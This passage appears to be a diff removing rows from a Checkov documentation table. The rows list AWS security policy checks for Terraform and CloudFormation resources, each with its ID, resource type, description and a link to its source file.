-|  791 | CKV_AWS_345              | resource                         | aws_networkfirewall_rule_group                                                                   | Ensure that Network firewall encryption is via a CMK                                                                                                                                                     | Terraform               | [NetworkFirewallUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallUsesCMK.py)                                                                           |
-|  792 | CKV_AWS_346              | resource                         | aws_networkfirewall_firewall_policy                                                              | Ensure Network Firewall Policy defines an encryption configuration that uses a customer managed Key (CMK)                                                                                                | Terraform               | [NetworkFirewallPolicyDefinesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkFirewallPolicyDefinesCMK.py)                                                         |
-|  793 | CKV_AWS_347              | resource                         | aws_neptune_cluster                                                                              | Ensure Neptune is encrypted by KMS using a customer managed Key (CMK)                                                                                                                                    | Terraform               | [NeptuneClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterEncryptedWithCMK.py)                                                           |
-|  794 | CKV_AWS_348              | resource                         | aws_iam_access_key                                                                               | Ensure IAM root user doesnt have Access keys                                                                                                                                                             | Terraform               | [IAMUserRootAccessKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserRootAccessKeys.py)                                                                             |
-|  795 | CKV_AWS_349              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts local disks                                                                                                                                           | Terraform               | [EMRClusterConfEncryptsLocalDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsLocalDisk.py)                                                         |
-|  796 | CKV_AWS_350              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts EBS disks                                                                                                                                             | Terraform               | [EMRClusterConfEncryptsEBS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsEBS.py)                                                                     |
-|  797 | CKV_AWS_351              | resource                         | aws_emr_security_configuration                                                                   | Ensure EMR Cluster security configuration encrypts InTransit                                                                                                                                             | Terraform               | [EMRClusterConfEncryptsInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterConfEncryptsInTransit.py)                                                         |
-|  798 | CKV_AWS_352              | resource                         | aws_network_acl_rule                                                                             | Ensure NACL ingress does not allow all Ports                                                                                                                                                             | Terraform               | [NetworkACLUnrestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestricted.py)                                                                           |
-|  799 | CKV_AWS_353              | resource                         | aws_db_instance                                                                                  | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform               | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                           |
-|  800 | CKV_AWS_353              | resource                         | aws_rds_cluster_instance                                                                         | Ensure that RDS instances have performance insights enabled                                                                                                                                              | Terraform               | [RDSInstancePerformanceInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerformanceInsights.py)                                                           |
-|  801 | CKV_AWS_354              | resource                         | aws_db_instance                                                                                  | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform               | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                       |
-|  802 | CKV_AWS_354              | resource                         | aws_rds_cluster_instance                                                                         | Ensure RDS Performance Insights are encrypted using KMS CMKs                                                                                                                                             | Terraform               | [RDSInstancePerfInsightsEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstancePerfInsightsEncryptionWithCMK.py)                                       |
-|  803 | CKV_AWS_355              | resource                         | aws_iam_group_policy                                                                             | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  804 | CKV_AWS_355              | resource                         | aws_iam_policy                                                                                   | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  805 | CKV_AWS_355              | resource                         | aws_iam_role_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  806 | CKV_AWS_355              | resource                         | aws_iam_user_policy                                                                              | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  807 | CKV_AWS_355              | resource                         | aws_ssoadmin_permission_set_inline_policy                                                        | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [IAMStarResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarResourcePolicyDocument.py)                                                             |
-|  808 | CKV_AWS_356              | data                             | aws_iam_policy_document                                                                          | Ensure no IAM policies documents allow "*" as a statement's resource for restrictable actions                                                                                                            | Terraform               | [ResourcePolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/ResourcePolicyDocument.py)                                                                               |
-|  809 | CKV_AWS_357              | resource                         | aws_transfer_server                                                                              | Ensure Transfer Server allows only secure protocols                                                                                                                                                      | Terraform               | [TransferServerAllowsOnlySecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerAllowsOnlySecureProtocols.py)                                         |
-|  810 | CKV_AWS_358              | data                             | aws_iam_policy_document                                                                          | Ensure GitHub Actions OIDC trust policies only allows actions from a specific known organization                                                                                                         | Terraform               | [GithubActionsOIDCTrustPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/GithubActionsOIDCTrustPolicy.py)                                                                   |
-|  811 | CKV_AWS_359              | resource                         | aws_neptune_cluster                                                                              | Neptune DB clusters should have IAM database authentication enabled                                                                                                                                      | Terraform               | [NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersIAMDatabaseAuthenticationEnabled.py)                     |
-|  812 | CKV_AWS_360              | resource                         | AWS::DocDB::DBCluster                                                                            | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Cloudformation          | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DocDBBackupRetention.py)                                                                          |
-|  813 | CKV_AWS_360              | resource                         | aws_docdb_cluster                                                                                | Ensure DocumentDB has an adequate backup retention period                                                                                                                                                | Terraform               | [DocDBBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBBackupRetention.py)                                                                               |
-|  814 | CKV_AWS_361              | resource                         | AWS::Neptune::DBCluster                                                                          | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Cloudformation          | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                        |
-|  815 | CKV_AWS_361              | resource                         | aws_neptune_cluster                                                                              | Ensure that Neptune DB cluster has automated backups enabled with adequate retention                                                                                                                     | Terraform               | [NeptuneClusterBackupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterBackupRetention.py)                                                             |
-|  816 | CKV_AWS_362              | resource                         | aws_neptune_cluster                                                                              | Neptune DB clusters should be configured to copy tags to snapshots                                                                                                                                       | Terraform               | [NeptuneDBClustersCopyTagsToSnapshots.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneDBClustersCopyTagsToSnapshots.py)                                               |
-|  817 | CKV_AWS_363              | resource                         | AWS::Lambda::Function                                                                            | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation          | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                    |
-|  818 | CKV_AWS_363              | resource                         | AWS::Serverless::Function                                                                        | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Cloudformation          | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                    |
-|  819 | CKV_AWS_363              | resource                         | aws_lambda_function                                                                              | Ensure Lambda Runtime is not deprecated                                                                                                                                                                  | Terraform               | [DeprecatedLambdaRuntime.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DeprecatedLambdaRuntime.py)                                                                         |
-|  820 | CKV_AWS_364              | resource                         | AWS::Lambda::Permission                                                                          | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Cloudformation          | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py)                                                                    |
-|  821 | CKV_AWS_364              | resource                         | aws_lambda_permission                                                                            | Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount                                                                                          | Terraform               | [LambdaServicePermission.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaServicePermission.py)                                                                         |
-|  822 | CKV_AWS_365              | resource                         | aws_ses_configuration_set                                                                        | Ensure SES Configuration Set enforces TLS usage                                                                                                                                                          | Terraform               | [SesConfigurationSetDefinesTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SesConfigurationSetDefinesTLS.py)                                                             |
-|  823 | CKV2_AWS_1               | resource                         | aws_network_acl                                                                                  | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform               | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                       |
-|  824 | CKV2_AWS_1               | resource                         | aws_subnet                                                                                       | Ensure that all NACL are attached to subnets                                                                                                                                                             | Terraform               | [SubnetHasACL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml)                                                                                       |
-|  825 | CKV2_AWS_2               | resource                         | aws_ebs_volume                                                                                   | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform               | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                     |
-|  826 | CKV2_AWS_2               | resource                         | aws_volume_attachment                                                                            | Ensure that only encrypted EBS volumes are attached to EC2 instances                                                                                                                                     | Terraform               | [EncryptedEBSVolumeOnlyConnectedToEC2s.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EncryptedEBSVolumeOnlyConnectedToEC2s.yaml)                                     |
-|  827 | CKV2_AWS_3               | resource                         | aws_guardduty_detector                                                                           | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform               | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                           |
-|  828 | CKV2_AWS_3               | resource                         | aws_guardduty_organization_configuration                                                         | Ensure GuardDuty is enabled to specific org/region                                                                                                                                                       | Terraform               | [GuardDutyIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/GuardDutyIsEnabled.yaml)                                                                           |
-|  829 | CKV2_AWS_4               | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform               | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                             |
-|  830 | CKV2_AWS_4               | resource                         | aws_api_gateway_stage                                                                            | Ensure API Gateway stage have logging level defined as appropriate                                                                                                                                       | Terraform               | [APIGWLoggingLevelsDefinedProperly.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIGWLoggingLevelsDefinedProperly.yaml)                                             |
-|  831 | CKV2_AWS_5               | resource                         | aws_security_group                                                                               | Ensure that Security Groups are attached to another resource                                                                                                                                             | Terraform               | [SGAttachedToResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml)                                                                       |
-|  832 | CKV2_AWS_6               | resource                         | aws_s3_bucket                                                                                    | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform               | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                       |
-|  833 | CKV2_AWS_6               | resource                         | aws_s3_bucket_public_access_block                                                                | Ensure that S3 bucket has a Public Access block                                                                                                                                                          | Terraform               | [S3BucketHasPublicAccessBlock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3BucketHasPublicAccessBlock.yaml)                                                       |
-|  834 | CKV2_AWS_7               | resource                         | aws_emr_cluster                                                                                  | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform               | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                       |
-|  835 | CKV2_AWS_7               | resource                         | aws_security_group                                                                               | Ensure that Amazon EMR clusters' security groups are not open to the world                                                                                                                               | Terraform               | [AMRClustersNotOpenToInternet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml)                                                       |
-|  836 | CKV2_AWS_8               | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS clusters has backup plan of AWS Backup                                                                                                                                                   | Terraform               | [RDSClusterHasBackupPlan.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/RDSClusterHasBackupPlan.yaml)                                                                 |
-|  837 | CKV2_AWS_9               | resource                         | aws_backup_selection                                                                             | Ensure that EBS are added in the backup plans of AWS Backup                                                                                                                                              | Terraform               | [EBSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EBSAddedBackup.yaml)                                                                                   |
-|  838 | CKV2_AWS_10              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail trails are integrated with CloudWatch Logs                                                                                                                                             | Terraform               | [CloudtrailHasCloudwatch.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudtrailHasCloudwatch.yaml)                                                                 |
-|  839 | CKV2_AWS_11              | resource                         | aws_vpc                                                                                          | Ensure VPC flow logging is enabled in all VPCs                                                                                                                                                           | Terraform               | [VPCHasFlowLog.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasFlowLog.yaml)                                                                                     |
-|  840 | CKV2_AWS_12              | resource                         | aws_default_security_group                                                                       | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform               | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                           |
-|  841 | CKV2_AWS_12              | resource                         | aws_vpc                                                                                          | Ensure the default security group of every VPC restricts all traffic                                                                                                                                     | Terraform               | [VPCHasRestrictedSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/VPCHasRestrictedSG.yaml)                                                                           |
-|  842 | CKV2_AWS_14              | resource                         | aws_iam_group                                                                                    | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform               | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                             |
-|  843 | CKV2_AWS_14              | resource                         | aws_iam_group_membership                                                                         | Ensure that IAM groups includes at least one IAM user                                                                                                                                                    | Terraform               | [IAMGroupHasAtLeastOneUser.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMGroupHasAtLeastOneUser.yaml)                                                             |
-|  844 | CKV2_AWS_15              | resource                         | aws_autoscaling_group                                                                            | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  845 | CKV2_AWS_15              | resource                         | aws_elb                                                                                          | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  846 | CKV2_AWS_15              | resource                         | aws_lb_target_group                                                                              | Ensure that auto Scaling groups that are associated with a load balancer are using Elastic Load Balancing health checks.                                                                                 | Terraform               | [AutoScallingEnabledELB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml)                                                                   |
-|  847 | CKV2_AWS_16              | resource                         | aws_appautoscaling_target                                                                        | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform               | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                             |
-|  848 | CKV2_AWS_16              | resource                         | aws_dynamodb_table                                                                               | Ensure that Auto Scaling is enabled on your DynamoDB tables                                                                                                                                              | Terraform               | [AutoScalingEnableOnDynamoDBTables.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScalingEnableOnDynamoDBTables.yaml)                                             |
-|  849 | CKV2_AWS_18              | resource                         | aws_backup_selection                                                                             | Ensure that Elastic File System (Amazon EFS) file systems are added in the backup plans of AWS Backup                                                                                                    | Terraform               | [EFSAddedBackup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EFSAddedBackup.yaml)                                                                                   |
-|  850 | CKV2_AWS_19              | resource                         | aws_eip                                                                                          | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform               | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                       |
-|  851 | CKV2_AWS_19              | resource                         | aws_eip_association                                                                              | Ensure that all EIP addresses allocated to a VPC are attached to EC2 instances                                                                                                                           | Terraform               | [EIPAllocatedToVPCAttachedEC2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml)                                                       |
-|  852 | CKV2_AWS_20              | resource                         | aws_alb                                                                                          | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  853 | CKV2_AWS_20              | resource                         | aws_alb_listener                                                                                 | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  854 | CKV2_AWS_20              | resource                         | aws_lb                                                                                           | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  855 | CKV2_AWS_20              | resource                         | aws_lb_listener                                                                                  | Ensure that ALB redirects HTTP requests into HTTPS ones                                                                                                                                                  | Terraform               | [ALBRedirectsHTTPToHTTPS.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBRedirectsHTTPToHTTPS.yaml)                                                                 |
-|  856 | CKV2_AWS_21              | resource                         | aws_iam_group_membership                                                                         | Ensure that all IAM users are members of at least one IAM group.                                                                                                                                         | Terraform               | [IAMUsersAreMembersAtLeastOneGroup.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUsersAreMembersAtLeastOneGroup.yaml)                                             |
-|  857 | CKV2_AWS_22              | resource                         | aws_iam_user                                                                                     | Ensure an IAM User does not have access to the console                                                                                                                                                   | Terraform               | [IAMUserHasNoConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/IAMUserHasNoConsoleAccess.yaml)                                                             |
-|  858 | CKV2_AWS_23              | resource                         | aws_route53_record                                                                               | Route53 A Record has Attached Resource                                                                                                                                                                   | Terraform               | [Route53ARecordAttachedResource.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/Route53ARecordAttachedResource.yaml)                                                   |
-|  859 | CKV2_AWS_27              | resource                         | aws_rds_cluster                                                                                  | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                             |
-|  860 | CKV2_AWS_27              | resource                         | aws_rds_cluster_parameter_group                                                                  | Ensure Postgres RDS as aws_rds_cluster has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresRDSHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml)                                             |
-|  861 | CKV2_AWS_28              | resource                         | aws_alb                                                                                          | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform               | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                             |
-|  862 | CKV2_AWS_28              | resource                         | aws_lb                                                                                           | Ensure public facing ALB are protected by WAF                                                                                                                                                            | Terraform               | [ALBProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/ALBProtectedByWAF.yaml)                                                                             |
-|  863 | CKV2_AWS_29              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform               | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                             |
-|  864 | CKV2_AWS_29              | resource                         | aws_api_gateway_stage                                                                            | Ensure public API gateway are protected by WAF                                                                                                                                                           | Terraform               | [APIProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/APIProtectedByWAF.yaml)                                                                             |
-|  865 | CKV2_AWS_30              | resource                         | aws_db_instance                                                                                  | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                               |
-|  866 | CKV2_AWS_30              | resource                         | aws_db_parameter_group                                                                           | Ensure Postgres RDS as aws_db_instance has Query Logging enabled                                                                                                                                         | Terraform               | [PostgresDBHasQueryLoggingEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/PostgresDBHasQueryLoggingEnabled.yaml)                                               |
-|  867 | CKV2_AWS_31              | resource                         | aws_wafv2_web_acl                                                                                | Ensure WAF2 has a Logging Configuration                                                                                                                                                                  | Terraform               | [WAF2HasLogs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/WAF2HasLogs.yaml)                                                                                         |
-|  868 | CKV2_AWS_32              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution has a response headers policy attached                                                                                                                                    | Terraform               | [CloudFrontHasResponseHeadersPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CloudFrontHasResponseHeadersPolicy.yaml)                                           |
-|  869 | CKV2_AWS_33              | resource                         | AWS::AppSync::GraphQLApi                                                                         | Ensure AppSync is protected by WAF                                                                                                                                                                       | Cloudformation          | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/graph_checks/AppSyncProtectedByWAF.yaml)                                                                    |
-|  870 | CKV2_AWS_33              | resource                         | aws_appsync_graphql_api                                                                          | Ensure AppSync is protected by WAF                                                                                                                                                                       | Terraform               | [AppSyncProtectedByWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AppSyncProtectedByWAF.yaml)                                                                     |
-|  871 | CKV2_AWS_34              | resource                         | aws_ssm_parameter                                                                                | AWS SSM Parameter should be Encrypted                                                                                                                                                                    | Terraform               | [AWSSSMParameterShouldBeEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSSSMParameterShouldBeEncrypted.yaml)                                               |
-|  872 | CKV2_AWS_35              | resource                         | aws_route                                                                                        | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform               | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                   |
-|  873 | CKV2_AWS_35              | resource                         | aws_route_table                                                                                  | AWS NAT Gateways should be utilized for the default route                                                                                                                                                | Terraform               | [AWSNATGatewaysshouldbeutilized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AWSNATGatewaysshouldbeutilized.yaml)                                                   |
-|  874 | CKV2_AWS_36              | resource                         | aws_ssm_parameter                                                                                | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform               | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                 |
-|  875 | CKV2_AWS_36              | resource                         | data.http                                                                                        | Ensure terraform is not sending SSM secrets to untrusted domains over HTTP                                                                                                                               | Terraform               | [HTTPNotSendingPasswords.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/HTTPNotSendingPasswords.yaml)                                                                 |
-|  876 | CKV2_AWS_37              | resource                         | aws                                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  877 | CKV2_AWS_37              | resource                         | aws_accessanalyzer_analyzer                                                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  878 | CKV2_AWS_37              | resource                         | aws_acm_certificate                                                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  879 | CKV2_AWS_37              | resource                         | aws_acm_certificate_validation                                                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  880 | CKV2_AWS_37              | resource                         | aws_acmpca_certificate_authority                                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform               | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
